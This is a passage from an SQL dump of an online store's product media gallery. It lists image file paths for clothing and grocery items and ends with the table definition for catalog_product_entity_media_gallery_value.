(3054, 90, '/w/p/wp01-black_main_1.jpg', 'image', 0),
(3055, 90, '/w/p/wp01-gray_main_1.jpg', 'image', 0),
(3056, 90, '/w/p/wp01-gray_back_1.jpg', 'image', 0),
(3057, 90, '/w/p/wp01-white_main_1.jpg', 'image', 0),
(3058, 90, '/w/p/wp01-gray_main_1.jpg', 'image', 0),
(3059, 90, '/w/p/wp01-gray_back_1.jpg', 'image', 0),
(3060, 90, '/w/p/wp02-blue_main_1.jpg', 'image', 0),
(3061, 90, '/w/p/wp02-blue_back_1.jpg', 'image', 0),
(3062, 90, '/w/p/wp02-purple_main_1.jpg', 'image', 0),
(3063, 90, '/w/p/wp02-red_main_1.jpg', 'image', 0),
(3064, 90, '/w/p/wp02-blue_main_1.jpg', 'image', 0),
(3065, 90, '/w/p/wp02-blue_back_1.jpg', 'image', 0),
(3066, 90, '/w/p/wp02-purple_main_1.jpg', 'image', 0),
(3067, 90, '/w/p/wp02-red_main_1.jpg', 'image', 0),
(3068, 90, '/w/p/wp02-blue_main_1.jpg', 'image', 0),
(3069, 90, '/w/p/wp02-blue_back_1.jpg', 'image', 0),
(3070, 90, '/w/p/wp03-black_main_1.jpg', 'image', 0),
(3071, 90, '/w/p/wp03-blue_main_1.jpg', 'image', 0),
(3072, 90, '/w/p/wp03-blue_alt1_1.jpg', 'image', 0),
(3073, 90, '/w/p/wp03-blue_back_1.jpg', 'image', 0),
(3074, 90, '/w/p/wp03-purple_main_1.jpg', 'image', 0),
(3075, 90, '/w/p/wp03-black_main_1.jpg', 'image', 0),
(3076, 90, '/w/p/wp03-blue_main_1.jpg', 'image', 0),
(3077, 90, '/w/p/wp03-blue_alt1_1.jpg', 'image', 0),
(3078, 90, '/w/p/wp03-blue_back_1.jpg', 'image', 0),
(3079, 90, '/w/p/wp03-purple_main_1.jpg', 'image', 0),
(3080, 90, '/w/p/wp03-blue_main_1.jpg', 'image', 0),
(3081, 90, '/w/p/wp03-blue_alt1_1.jpg', 'image', 0),
(3082, 90, '/w/p/wp03-blue_back_1.jpg', 'image', 0),
(3083, 90, '/w/p/wp04-black_main_1.jpg', 'image', 0),
(3084, 90, '/w/p/wp04-blue_main_1.jpg', 'image', 0),
(3085, 90, '/w/p/wp04-blue_alt1_1.jpg', 'image', 0),
(3086, 90, '/w/p/wp04-blue_alternate_1.jpg', 'image', 0),
(3087, 90, '/w/p/wp04-blue_back_1.jpg', 'image', 0),
(3088, 90, '/w/p/wp04-white_main_1.jpg', 'image', 0),
(3089, 90, '/w/p/wp04-black_main_1.jpg', 'image', 0),
(3090, 90, '/w/p/wp04-blue_main_1.jpg', 'image', 0),
(3091, 90, '/w/p/wp04-blue_alt1_1.jpg', 'image', 0),
(3092, 90, '/w/p/wp04-blue_alternate_1.jpg', 'image', 0),
(3093, 90, '/w/p/wp04-blue_back_1.jpg', 'image', 0),
(3094, 90, '/w/p/wp04-white_main_1.jpg', 'image', 0),
(3095, 90, '/w/p/wp04-blue_main_1.jpg', 'image', 0),
(3096, 90, '/w/p/wp04-blue_alt1_1.jpg', 'image', 0),
(3097, 90, '/w/p/wp04-blue_alternate_1.jpg', 'image', 0),
(3098, 90, '/w/p/wp04-blue_back_1.jpg', 'image', 0),
(3099, 90, '/w/p/wp05-blue_main_1.jpg', 'image', 0),
(3100, 90, '/w/p/wp05-gray_main_1.jpg', 'image', 0),
(3101, 90, '/w/p/wp05-gray_alt1_1.jpg', 'image', 0),
(3102, 90, '/w/p/wp05-gray_back_1.jpg', 'image', 0),
(3103, 90, '/w/p/wp05-red_main_1.jpg', 'image', 0),
(3104, 90, '/w/p/wp05-blue_main_1.jpg', 'image', 0),
(3105, 90, '/w/p/wp05-gray_main_1.jpg', 'image', 0),
(3106, 90, '/w/p/wp05-gray_alt1_1.jpg', 'image', 0),
(3107, 90, '/w/p/wp05-gray_back_1.jpg', 'image', 0),
(3108, 90, '/w/p/wp05-red_main_1.jpg', 'image', 0),
(3109, 90, '/w/p/wp05-gray_main_2.jpg', 'image', 0),
(3110, 90, '/w/p/wp05-gray_alt1_2.jpg', 'image', 0),
(3111, 90, '/w/p/wp05-gray_back_2.jpg', 'image', 0),
(3112, 90, '/w/p/wp06-black_main_1.jpg', 'image', 0),
(3113, 90, '/w/p/wp06-black_alt1_1.jpg', 'image', 0),
(3114, 90, '/w/p/wp06-black_back_1.jpg', 'image', 0),
(3115, 90, '/w/p/wp06-black_outfit_1.jpg', 'image', 0),
(3116, 90, '/w/p/wp06-blue_main_1.jpg', 'image', 0),
(3117, 90, '/w/p/wp06-orange_main_1.jpg', 'image', 0),
(3118, 90, '/w/p/wp06-black_main_1.jpg', 'image', 0),
(3119, 90, '/w/p/wp06-black_alt1_1.jpg', 'image', 0),
(3120, 90, '/w/p/wp06-black_back_1.jpg', 'image', 0),
(3121, 90, '/w/p/wp06-black_outfit_1.jpg', 'image', 0),
(3122, 90, '/w/p/wp06-blue_main_1.jpg', 'image', 0),
(3123, 90, '/w/p/wp06-orange_main_1.jpg', 'image', 0),
(3124, 90, '/w/p/wp06-black_main_1.jpg', 'image', 0),
(3125, 90, '/w/p/wp06-black_alt1_1.jpg', 'image', 0),
(3126, 90, '/w/p/wp06-black_back_1.jpg', 'image', 0),
(3127, 90, '/w/p/wp06-black_outfit_1.jpg', 'image', 0),
(3128, 90, '/w/p/wp07-black_main_1.jpg', 'image', 0),
(3129, 90, '/w/p/wp07-black_alt1_1.jpg', 'image', 0),
(3130, 90, '/w/p/wp07-black_back_1.jpg', 'image', 0),
(3131, 90, '/w/p/wp07-blue_main_1.jpg', 'image', 0),
(3132, 90, '/w/p/wp07-orange_main_1.jpg', 'image', 0),
(3133, 90, '/w/p/wp07-black_main_1.jpg', 'image', 0),
(3134, 90, '/w/p/wp07-black_alt1_1.jpg', 'image', 0),
(3135, 90, '/w/p/wp07-black_back_1.jpg', 'image', 0),
(3136, 90, '/w/p/wp07-blue_main_1.jpg', 'image', 0),
(3137, 90, '/w/p/wp07-orange_main_1.jpg', 'image', 0),
(3138, 90, '/w/p/wp07-black_main_1.jpg', 'image', 0),
(3139, 90, '/w/p/wp07-black_alt1_1.jpg', 'image', 0),
(3140, 90, '/w/p/wp07-black_back_1.jpg', 'image', 0),
(3141, 90, '/w/p/wp08-black_main_1.jpg', 'image', 0),
(3142, 90, '/w/p/wp08-black_back_1.jpg', 'image', 0),
(3143, 90, '/w/p/wp08-green_main_1.jpg', 'image', 0),
(3144, 90, '/w/p/wp08-red_main_1.jpg', 'image', 0),
(3145, 90, '/w/p/wp08-black_main_1.jpg', 'image', 0),
(3146, 90, '/w/p/wp08-black_back_1.jpg', 'image', 0),
(3147, 90, '/w/p/wp08-green_main_1.jpg', 'image', 0),
(3148, 90, '/w/p/wp08-red_main_1.jpg', 'image', 0),
(3149, 90, '/w/p/wp08-black_main_1.jpg', 'image', 0),
(3150, 90, '/w/p/wp08-black_back_1.jpg', 'image', 0),
(3151, 90, '/w/p/wp09-black_main_1.jpg', 'image', 0),
(3152, 90, '/w/p/wp09-black_alt1_1.jpg', 'image', 0),
(3153, 90, '/w/p/wp09-black_back_1.jpg', 'image', 0),
(3154, 90, '/w/p/wp09-black_outfit_1.jpg', 'image', 0),
(3155, 90, '/w/p/wp09-blue_main_1.jpg', 'image', 0),
(3156, 90, '/w/p/wp09-purple_main_1.jpg', 'image', 0),
(3157, 90, '/w/p/wp09-black_main_1.jpg', 'image', 0),
(3158, 90, '/w/p/wp09-black_alt1_1.jpg', 'image', 0),
(3159, 90, '/w/p/wp09-black_back_1.jpg', 'image', 0),
(3160, 90, '/w/p/wp09-black_outfit_1.jpg', 'image', 0),
(3161, 90, '/w/p/wp09-blue_main_1.jpg', 'image', 0),
(3162, 90, '/w/p/wp09-purple_main_1.jpg', 'image', 0),
(3163, 90, '/w/p/wp09-black_main_1.jpg', 'image', 0),
(3164, 90, '/w/p/wp09-black_alt1_1.jpg', 'image', 0),
(3165, 90, '/w/p/wp09-black_back_1.jpg', 'image', 0),
(3166, 90, '/w/p/wp09-black_outfit_1.jpg', 'image', 0),
(3167, 90, '/w/p/wp10-black_main_1.jpg', 'image', 0),
(3168, 90, '/w/p/wp10-gray_main_1.jpg', 'image', 0),
(3169, 90, '/w/p/wp10-gray_alt1_1.jpg', 'image', 0),
(3170, 90, '/w/p/wp10-gray_back_1.jpg', 'image', 0),
(3171, 90, '/w/p/wp10-white_main_1.jpg', 'image', 0),
(3172, 90, '/w/p/wp10-black_main_1.jpg', 'image', 0),
(3173, 90, '/w/p/wp10-gray_main_1.jpg', 'image', 0),
(3174, 90, '/w/p/wp10-gray_alt1_1.jpg', 'image', 0),
(3175, 90, '/w/p/wp10-gray_back_1.jpg', 'image', 0),
(3176, 90, '/w/p/wp10-white_main_1.jpg', 'image', 0),
(3177, 90, '/w/p/wp10-gray_main_1.jpg', 'image', 0),
(3178, 90, '/w/p/wp10-gray_alt1_1.jpg', 'image', 0),
(3179, 90, '/w/p/wp10-gray_back_1.jpg', 'image', 0),
(3180, 90, '/w/p/wp11-blue_main_1.jpg', 'image', 0),
(3181, 90, '/w/p/wp11-green_main_1.jpg', 'image', 0),
(3182, 90, '/w/p/wp11-green_back_1.jpg', 'image', 0),
(3183, 90, '/w/p/wp11-red_main_1.jpg', 'image', 0),
(3184, 90, '/w/p/wp11-blue_main_1.jpg', 'image', 0),
(3185, 90, '/w/p/wp11-green_main_1.jpg', 'image', 0),
(3186, 90, '/w/p/wp11-green_back_1.jpg', 'image', 0),
(3187, 90, '/w/p/wp11-red_main_1.jpg', 'image', 0),
(3188, 90, '/w/p/wp11-green_main_1.jpg', 'image', 0),
(3189, 90, '/w/p/wp11-green_back_1.jpg', 'image', 0),
(3190, 90, '/w/p/wp12-blue_main_1.jpg', 'image', 0),
(3191, 90, '/w/p/wp12-gray_main_1.jpg', 'image', 0),
(3192, 90, '/w/p/wp12-gray_back_1.jpg', 'image', 0),
(3193, 90, '/w/p/wp12-green_main_1.jpg', 'image', 0),
(3194, 90, '/w/p/wp12-blue_main_1.jpg', 'image', 0),
(3195, 90, '/w/p/wp12-gray_main_1.jpg', 'image', 0),
(3196, 90, '/w/p/wp12-gray_back_1.jpg', 'image', 0),
(3197, 90, '/w/p/wp12-green_main_1.jpg', 'image', 0),
(3198, 90, '/w/p/wp12-gray_main_1.jpg', 'image', 0),
(3199, 90, '/w/p/wp12-gray_back_1.jpg', 'image', 0),
(3200, 90, '/w/p/wp13-blue_main_1.jpg', 'image', 0),
(3201, 90, '/w/p/wp13-green_main_1.jpg', 'image', 0),
(3202, 90, '/w/p/wp13-orange_main_1.jpg', 'image', 0),
(3203, 90, '/w/p/wp13-orange_back_1.jpg', 'image', 0),
(3204, 90, '/w/p/wp13-blue_main_1.jpg', 'image', 0),
(3205, 90, '/w/p/wp13-green_main_1.jpg', 'image', 0),
(3206, 90, '/w/p/wp13-orange_main_1.jpg', 'image', 0),
(3207, 90, '/w/p/wp13-orange_back_1.jpg', 'image', 0),
(3208, 90, '/w/p/wp13-orange_main_1.jpg', 'image', 0),
(3209, 90, '/w/p/wp13-orange_back_1.jpg', 'image', 0),
(3210, 90, '/w/s/wsh01-black_main_1.jpg', 'image', 0),
(3211, 90, '/w/s/wsh01-black_back_1.jpg', 'image', 0),
(3212, 90, '/w/s/wsh01-green_main_1.jpg', 'image', 0),
(3213, 90, '/w/s/wsh01-red_main_1.jpg', 'image', 0),
(3214, 90, '/w/s/wsh01-black_main_1.jpg', 'image', 0),
(3215, 90, '/w/s/wsh01-black_back_1.jpg', 'image', 0),
(3216, 90, '/w/s/wsh01-green_main_1.jpg', 'image', 0),
(3217, 90, '/w/s/wsh01-red_main_1.jpg', 'image', 0),
(3218, 90, '/w/s/wsh01-black_main_1.jpg', 'image', 0),
(3219, 90, '/w/s/wsh01-black_back_1.jpg', 'image', 0),
(3220, 90, '/w/s/wsh01-green_main_1.jpg', 'image', 0),
(3221, 90, '/w/s/wsh01-red_main_1.jpg', 'image', 0),
(3222, 90, '/w/s/wsh01-black_main_1.jpg', 'image', 0),
(3223, 90, '/w/s/wsh01-black_back_1.jpg', 'image', 0),
(3224, 90, '/w/s/wsh01-green_main_1.jpg', 'image', 0),
(3225, 90, '/w/s/wsh01-red_main_1.jpg', 'image', 0),
(3226, 90, '/w/s/wsh01-black_main_1.jpg', 'image', 0),
(3227, 90, '/w/s/wsh01-black_back_1.jpg', 'image', 0),
(3228, 90, '/w/s/wsh01-green_main_1.jpg', 'image', 0),
(3229, 90, '/w/s/wsh01-red_main_1.jpg', 'image', 0),
(3230, 90, '/w/s/wsh01-black_main_1.jpg', 'image', 0),
(3231, 90, '/w/s/wsh01-black_back_1.jpg', 'image', 0),
(3232, 90, '/w/s/wsh02-gray_main_1.jpg', 'image', 0),
(3233, 90, '/w/s/wsh02-gray_back_1.jpg', 'image', 0),
(3234, 90, '/w/s/wsh02-orange_main_1.jpg', 'image', 0),
(3235, 90, '/w/s/wsh02-yellow_main_1.jpg', 'image', 0),
(3236, 90, '/w/s/wsh02-gray_main_1.jpg', 'image', 0),
(3237, 90, '/w/s/wsh02-gray_back_1.jpg', 'image', 0),
(3238, 90, '/w/s/wsh02-orange_main_1.jpg', 'image', 0),
(3239, 90, '/w/s/wsh02-yellow_main_1.jpg', 'image', 0),
(3240, 90, '/w/s/wsh02-gray_main_1.jpg', 'image', 0),
(3241, 90, '/w/s/wsh02-gray_back_1.jpg', 'image', 0),
(3242, 90, '/w/s/wsh02-orange_main_1.jpg', 'image', 0),
(3243, 90, '/w/s/wsh02-yellow_main_1.jpg', 'image', 0),
(3244, 90, '/w/s/wsh02-gray_main_1.jpg', 'image', 0),
(3245, 90, '/w/s/wsh02-gray_back_1.jpg', 'image', 0),
(3246, 90, '/w/s/wsh02-orange_main_1.jpg', 'image', 0),
(3247, 90, '/w/s/wsh02-yellow_main_1.jpg', 'image', 0),
(3248, 90, '/w/s/wsh02-gray_main_1.jpg', 'image', 0),
(3249, 90, '/w/s/wsh02-gray_back_1.jpg', 'image', 0),
(3250, 90, '/w/s/wsh02-orange_main_1.jpg', 'image', 0),
(3251, 90, '/w/s/wsh02-yellow_main_1.jpg', 'image', 0),
(3252, 90, '/w/s/wsh02-gray_main_1.jpg', 'image', 0),
(3253, 90, '/w/s/wsh02-gray_back_1.jpg', 'image', 0),
(3254, 90, '/w/s/wsh03-blue_main_1.jpg', 'image', 0),
(3255, 90, '/w/s/wsh03-gray_main_1.jpg', 'image', 0),
(3256, 90, '/w/s/wsh03-gray_alt1_1.jpg', 'image', 0),
(3257, 90, '/w/s/wsh03-gray_back_1.jpg', 'image', 0),
(3258, 90, '/w/s/wsh03-orange_main_1.jpg', 'image', 0),
(3259, 90, '/w/s/wsh03-blue_main_1.jpg', 'image', 0),
(3260, 90, '/w/s/wsh03-gray_main_1.jpg', 'image', 0),
(3261, 90, '/w/s/wsh03-gray_alt1_1.jpg', 'image', 0),
(3262, 90, '/w/s/wsh03-gray_back_1.jpg', 'image', 0),
(3263, 90, '/w/s/wsh03-orange_main_1.jpg', 'image', 0),
(3264, 90, '/w/s/wsh03-blue_main_1.jpg', 'image', 0),
(3265, 90, '/w/s/wsh03-gray_main_1.jpg', 'image', 0),
(3266, 90, '/w/s/wsh03-gray_alt1_1.jpg', 'image', 0),
(3267, 90, '/w/s/wsh03-gray_back_1.jpg', 'image', 0),
(3268, 90, '/w/s/wsh03-orange_main_1.jpg', 'image', 0),
(3269, 90, '/w/s/wsh03-blue_main_1.jpg', 'image', 0),
(3270, 90, '/w/s/wsh03-gray_main_1.jpg', 'image', 0),
(3271, 90, '/w/s/wsh03-gray_alt1_1.jpg', 'image', 0),
(3272, 90, '/w/s/wsh03-gray_back_1.jpg', 'image', 0),
(3273, 90, '/w/s/wsh03-orange_main_2.jpg', 'image', 0),
(3274, 90, '/w/s/wsh03-blue_main_2.jpg', 'image', 0),
(3275, 90, '/w/s/wsh03-gray_main_2.jpg', 'image', 0),
(3276, 90, '/w/s/wsh03-gray_alt1_2.jpg', 'image', 0),
(3277, 90, '/w/s/wsh03-gray_back_2.jpg', 'image', 0),
(3278, 90, '/w/s/wsh03-orange_main_2.jpg', 'image', 0),
(3279, 90, '/w/s/wsh03-gray_main_2.jpg', 'image', 0),
(3280, 90, '/w/s/wsh03-gray_alt1_2.jpg', 'image', 0),
(3281, 90, '/w/s/wsh03-gray_back_2.jpg', 'image', 0),
(3282, 90, '/w/s/wsh04-black_main_1.jpg', 'image', 0),
(3283, 90, '/w/s/wsh04-black_alt1_1.jpg', 'image', 0),
(3284, 90, '/w/s/wsh04-black_back_1.jpg', 'image', 0),
(3285, 90, '/w/s/wsh04-green_main_1.jpg', 'image', 0),
(3286, 90, '/w/s/wsh04-orange_main_1.jpg', 'image', 0),
(3287, 90, '/w/s/wsh04-black_main_1.jpg', 'image', 0),
(3288, 90, '/w/s/wsh04-black_alt1_1.jpg', 'image', 0),
(3289, 90, '/w/s/wsh04-black_back_1.jpg', 'image', 0),
(3290, 90, '/w/s/wsh04-green_main_1.jpg', 'image', 0),
(3291, 90, '/w/s/wsh04-orange_main_1.jpg', 'image', 0),
(3292, 90, '/w/s/wsh04-black_main_1.jpg', 'image', 0),
(3293, 90, '/w/s/wsh04-black_alt1_1.jpg', 'image', 0),
(3294, 90, '/w/s/wsh04-black_back_1.jpg', 'image', 0),
(3295, 90, '/w/s/wsh04-green_main_1.jpg', 'image', 0),
(3296, 90, '/w/s/wsh04-orange_main_1.jpg', 'image', 0),
(3297, 90, '/w/s/wsh04-black_main_1.jpg', 'image', 0),
(3298, 90, '/w/s/wsh04-black_alt1_1.jpg', 'image', 0),
(3299, 90, '/w/s/wsh04-black_back_1.jpg', 'image', 0),
(3300, 90, '/w/s/wsh04-green_main_1.jpg', 'image', 0),
(3301, 90, '/w/s/wsh04-orange_main_1.jpg', 'image', 0),
(3302, 90, '/w/s/wsh04-black_main_1.jpg', 'image', 0),
(3303, 90, '/w/s/wsh04-black_alt1_1.jpg', 'image', 0),
(3304, 90, '/w/s/wsh04-black_back_1.jpg', 'image', 0),
(3305, 90, '/w/s/wsh04-green_main_1.jpg', 'image', 0),
(3306, 90, '/w/s/wsh04-orange_main_1.jpg', 'image', 0),
(3307, 90, '/w/s/wsh04-black_main_1.jpg', 'image', 0),
(3308, 90, '/w/s/wsh04-black_alt1_1.jpg', 'image', 0),
(3309, 90, '/w/s/wsh04-black_back_1.jpg', 'image', 0),
(3310, 90, '/w/s/wsh05-blue_main_1.jpg', 'image', 0),
(3311, 90, '/w/s/wsh05-blue_back_1.jpg', 'image', 0),
(3312, 90, '/w/s/wsh05-purple_main_1.jpg', 'image', 0),
(3313, 90, '/w/s/wsh05-yellow_main_1.jpg', 'image', 0),
(3314, 90, '/w/s/wsh05-blue_main_1.jpg', 'image', 0),
(3315, 90, '/w/s/wsh05-blue_back_1.jpg', 'image', 0),
(3316, 90, '/w/s/wsh05-purple_main_1.jpg', 'image', 0),
(3317, 90, '/w/s/wsh05-yellow_main_1.jpg', 'image', 0),
(3318, 90, '/w/s/wsh05-blue_main_1.jpg', 'image', 0),
(3319, 90, '/w/s/wsh05-blue_back_1.jpg', 'image', 0),
(3320, 90, '/w/s/wsh05-purple_main_1.jpg', 'image', 0),
(3321, 90, '/w/s/wsh05-yellow_main_1.jpg', 'image', 0),
(3322, 90, '/w/s/wsh05-blue_main_1.jpg', 'image', 0),
(3323, 90, '/w/s/wsh05-blue_back_1.jpg', 'image', 0),
(3324, 90, '/w/s/wsh05-purple_main_1.jpg', 'image', 0),
(3325, 90, '/w/s/wsh05-yellow_main_1.jpg', 'image', 0),
(3326, 90, '/w/s/wsh05-blue_main_1.jpg', 'image', 0),
(3327, 90, '/w/s/wsh05-blue_back_1.jpg', 'image', 0),
(3328, 90, '/w/s/wsh05-purple_main_1.jpg', 'image', 0),
(3329, 90, '/w/s/wsh05-yellow_main_1.jpg', 'image', 0),
(3330, 90, '/w/s/wsh05-blue_main_1.jpg', 'image', 0),
(3331, 90, '/w/s/wsh05-blue_back_1.jpg', 'image', 0),
(3332, 90, '/w/s/wsh06-gray_main_1.jpg', 'image', 0),
(3333, 90, '/w/s/wsh06-gray_alt1_1.jpg', 'image', 0),
(3334, 90, '/w/s/wsh06-gray_back_1.jpg', 'image', 0),
(3335, 90, '/w/s/wsh06-orange_main_1.jpg', 'image', 0),
(3336, 90, '/w/s/wsh06-purple_main_1.jpg', 'image', 0),
(3337, 90, '/w/s/wsh06-gray_main_1.jpg', 'image', 0),
(3338, 90, '/w/s/wsh06-gray_alt1_1.jpg', 'image', 0),
(3339, 90, '/w/s/wsh06-gray_back_1.jpg', 'image', 0),
(3340, 90, '/w/s/wsh06-orange_main_1.jpg', 'image', 0),
(3341, 90, '/w/s/wsh06-purple_main_1.jpg', 'image', 0),
(3342, 90, '/w/s/wsh06-gray_main_1.jpg', 'image', 0),
(3343, 90, '/w/s/wsh06-gray_alt1_1.jpg', 'image', 0),
(3344, 90, '/w/s/wsh06-gray_back_1.jpg', 'image', 0),
(3345, 90, '/w/s/wsh07-black_main_1.jpg', 'image', 0),
(3346, 90, '/w/s/wsh07-black_back_1.jpg', 'image', 0),
(3347, 90, '/w/s/wsh07-blue_main_1.jpg', 'image', 0),
(3348, 90, '/w/s/wsh07-purple_main_1.jpg', 'image', 0),
(3349, 90, '/w/s/wsh07-black_main_1.jpg', 'image', 0),
(3350, 90, '/w/s/wsh07-black_back_1.jpg', 'image', 0),
(3351, 90, '/w/s/wsh07-blue_main_1.jpg', 'image', 0),
(3352, 90, '/w/s/wsh07-purple_main_1.jpg', 'image', 0),
(3353, 90, '/w/s/wsh07-black_main_1.jpg', 'image', 0),
(3354, 90, '/w/s/wsh07-black_back_1.jpg', 'image', 0),
(3355, 90, '/w/s/wsh08-purple_main_1.jpg', 'image', 0),
(3356, 90, '/w/s/wsh08-purple_back_1.jpg', 'image', 0),
(3357, 90, '/w/s/wsh08-purple_main_1.jpg', 'image', 0),
(3358, 90, '/w/s/wsh08-purple_back_1.jpg', 'image', 0),
(3359, 90, '/w/s/wsh08-purple_main_1.jpg', 'image', 0),
(3360, 90, '/w/s/wsh08-purple_back_1.jpg', 'image', 0),
(3361, 90, '/w/s/wsh08-purple_main_1.jpg', 'image', 0),
(3362, 90, '/w/s/wsh08-purple_back_1.jpg', 'image', 0),
(3363, 90, '/w/s/wsh08-purple_main_1.jpg', 'image', 0),
(3364, 90, '/w/s/wsh08-purple_back_1.jpg', 'image', 0),
(3365, 90, '/w/s/wsh08-purple_main_1.jpg', 'image', 0),
(3366, 90, '/w/s/wsh08-purple_back_1.jpg', 'image', 0),
(3367, 90, '/w/s/wsh09-gray_main_1.jpg', 'image', 0),
(3368, 90, '/w/s/wsh09-gray_alt1_1.jpg', 'image', 0),
(3369, 90, '/w/s/wsh09-gray_back_1.jpg', 'image', 0),
(3370, 90, '/w/s/wsh09-green_main_1.jpg', 'image', 0),
(3371, 90, '/w/s/wsh09-white_main_1.jpg', 'image', 0),
(3372, 90, '/w/s/wsh09-gray_main_1.jpg', 'image', 0),
(3373, 90, '/w/s/wsh09-gray_alt1_1.jpg', 'image', 0),
(3374, 90, '/w/s/wsh09-gray_back_1.jpg', 'image', 0),
(3375, 90, '/w/s/wsh09-green_main_1.jpg', 'image', 0),
(3376, 90, '/w/s/wsh09-white_main_1.jpg', 'image', 0),
(3377, 90, '/w/s/wsh09-gray_main_1.jpg', 'image', 0),
(3378, 90, '/w/s/wsh09-gray_alt1_1.jpg', 'image', 0),
(3379, 90, '/w/s/wsh09-gray_back_1.jpg', 'image', 0),
(3380, 90, '/w/s/wsh10-black_main_1.jpg', 'image', 0),
(3381, 90, '/w/s/wsh10-black_alt1_1.jpg', 'image', 0),
(3382, 90, '/w/s/wsh10-black_back_1.jpg', 'image', 0),
(3383, 90, '/w/s/wsh10-orange_main_1.jpg', 'image', 0),
(3384, 90, '/w/s/wsh10-white_main_1.jpg', 'image', 0),
(3385, 90, '/w/s/wsh10-black_main_1.jpg', 'image', 0),
(3386, 90, '/w/s/wsh10-black_alt1_1.jpg', 'image', 0),
(3387, 90, '/w/s/wsh10-black_back_1.jpg', 'image', 0),
(3388, 90, '/w/s/wsh10-orange_main_1.jpg', 'image', 0),
(3389, 90, '/w/s/wsh10-white_main_1.jpg', 'image', 0),
(3390, 90, '/w/s/wsh10-black_main_1.jpg', 'image', 0),
(3391, 90, '/w/s/wsh10-black_alt1_1.jpg', 'image', 0),
(3392, 90, '/w/s/wsh10-black_back_1.jpg', 'image', 0),
(3393, 90, '/w/s/wsh11-blue_main_1.jpg', 'image', 0),
(3394, 90, '/w/s/wsh11-blue_back_1.jpg', 'image', 0),
(3395, 90, '/w/s/wsh11-orange_main_1.jpg', 'image', 0),
(3396, 90, '/w/s/wsh11-red_main_1.jpg', 'image', 0),
(3397, 90, '/w/s/wsh11-blue_main_1.jpg', 'image', 0),
(3398, 90, '/w/s/wsh11-blue_back_1.jpg', 'image', 0),
(3399, 90, '/w/s/wsh11-orange_main_1.jpg', 'image', 0),
(3400, 90, '/w/s/wsh11-red_main_1.jpg', 'image', 0),
(3401, 90, '/w/s/wsh11-blue_main_1.jpg', 'image', 0),
(3402, 90, '/w/s/wsh11-blue_back_1.jpg', 'image', 0),
(3403, 90, '/w/s/wsh12-green_main_1.jpg', 'image', 0),
(3404, 90, '/w/s/wsh12-green_alt1_1.jpg', 'image', 0),
(3405, 90, '/w/s/wsh12-green_back_1.jpg', 'image', 0),
(3406, 90, '/w/s/wsh12-purple_main_1.jpg', 'image', 0),
(3407, 90, '/w/s/wsh12-red_main_1.jpg', 'image', 0),
(3408, 90, '/w/s/wsh12-green_main_1.jpg', 'image', 0),
(3409, 90, '/w/s/wsh12-green_alt1_1.jpg', 'image', 0),
(3410, 90, '/w/s/wsh12-green_back_1.jpg', 'image', 0),
(3411, 90, '/w/s/wsh12-purple_main_1.jpg', 'image', 0),
(3412, 90, '/w/s/wsh12-red_main_1.jpg', 'image', 0),
(3413, 90, '/w/s/wsh12-green_main_1.jpg', 'image', 0),
(3414, 90, '/w/s/wsh12-green_alt1_1.jpg', 'image', 0),
(3415, 90, '/w/s/wsh12-green_back_1.jpg', 'image', 0),
(3416, 90, '/w/s/wsh12-purple_main_1.jpg', 'image', 0),
(3417, 90, '/w/s/wsh12-red_main_1.jpg', 'image', 0),
(3418, 90, '/w/s/wsh12-green_main_1.jpg', 'image', 0),
(3419, 90, '/w/s/wsh12-green_alt1_1.jpg', 'image', 0),
(3420, 90, '/w/s/wsh12-green_back_1.jpg', 'image', 0),
(3421, 90, '/w/s/wsh12-purple_main_1.jpg', 'image', 0),
(3422, 90, '/w/s/wsh12-red_main_1.jpg', 'image', 0),
(3423, 90, '/w/s/wsh12-green_main_1.jpg', 'image', 0),
(3424, 90, '/w/s/wsh12-green_alt1_1.jpg', 'image', 0),
(3425, 90, '/w/s/wsh12-green_back_1.jpg', 'image', 0),
(3426, 90, '/w/s/wsh12-purple_main_1.jpg', 'image', 0),
(3427, 90, '/w/s/wsh12-red_main_1.jpg', 'image', 0),
(3428, 90, '/w/s/wsh12-green_main_1.jpg', 'image', 0),
(3429, 90, '/w/s/wsh12-green_alt1_1.jpg', 'image', 0),
(3430, 90, '/w/s/wsh12-green_back_1.jpg', 'image', 0),
(3431, 90, '/r/a/ramylemon.png', 'image', 0),
(3437, 90, '/v/a/vaslin.png', 'image', 0),
(3447, 90, '/d/u/dudh-500-ml.png', 'image', 0),
(3448, 90, '/g/o/gowala-ghee-500-mg.png', 'image', 0),
(3449, 90, '/f/r/fresh-soya-bean-oil.png', 'image', 0),
(3450, 90, '/l/i/lizol-floor-cleaner-975-ml.jpg', 'image', 0),
(3451, 90, '/d/e/dettol-handwash-refill-170ml.jpg', 'image', 0),
(3452, 90, '/i/m/img_7806.jpg2_.jpg', 'image', 0),
(3453, 90, '/r/u/ruchi-tomato-ketchup-.jpg', 'image', 0),
(3454, 90, '/r/a/radhuni-borhani-masala.png', 'image', 0),
(3455, 90, '/d/e/dettol-handwash-liquid-soap-pump.jpeg', 'image', 0),
(3456, 90, '/l/i/lizol-floor-cleaner-975-ml_1.jpg', 'image', 0),
(3457, 90, '/r/o/rosmalai-600gm.png', 'image', 0),
(3458, 90, '/g/o/gowala-ghee-500-mg_1.png', 'image', 0),
(3459, 90, '/1/3/13-dudh-500-ml-2.png', 'image', 0),
(3460, 90, '/d/u/dudh-500-ml_1.png', 'image', 0),
(3461, 90, '/t/r/trix-dish-wash-liquid-.jpg', 'image', 0),
(3462, 90, '/d/e/dettol-handwash-liquid-soap-pump_1.jpeg', 'image', 0),
(3463, 90, '/c/h/chuly_cure_box_white.jpg', 'image', 0),
(3464, 90, '/c/o/cold_cream-07.png', 'image', 0),
(3465, 90, '/c/o/cold_cream-05.png', 'image', 0);

-- --------------------------------------------------------

--
-- Table structure for table `catalog_product_entity_media_gallery_value`
--

CREATE TABLE `catalog_product_entity_media_gallery_value` (
  `value_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Value ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `label` varchar(255) DEFAULT NULL COMMENT 'Label',
  `position` int(10) UNSIGNED DEFAULT NULL COMMENT 'Position',
  `disabled` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Disabled',
  `record_id` int(10) UNSIGNED NOT NULL COMMENT 'Record ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Catalog Product Media Gallery Attribute Value Table';

--
-- Dumping data for table `catalog_product_entity_media_gallery_value`
--

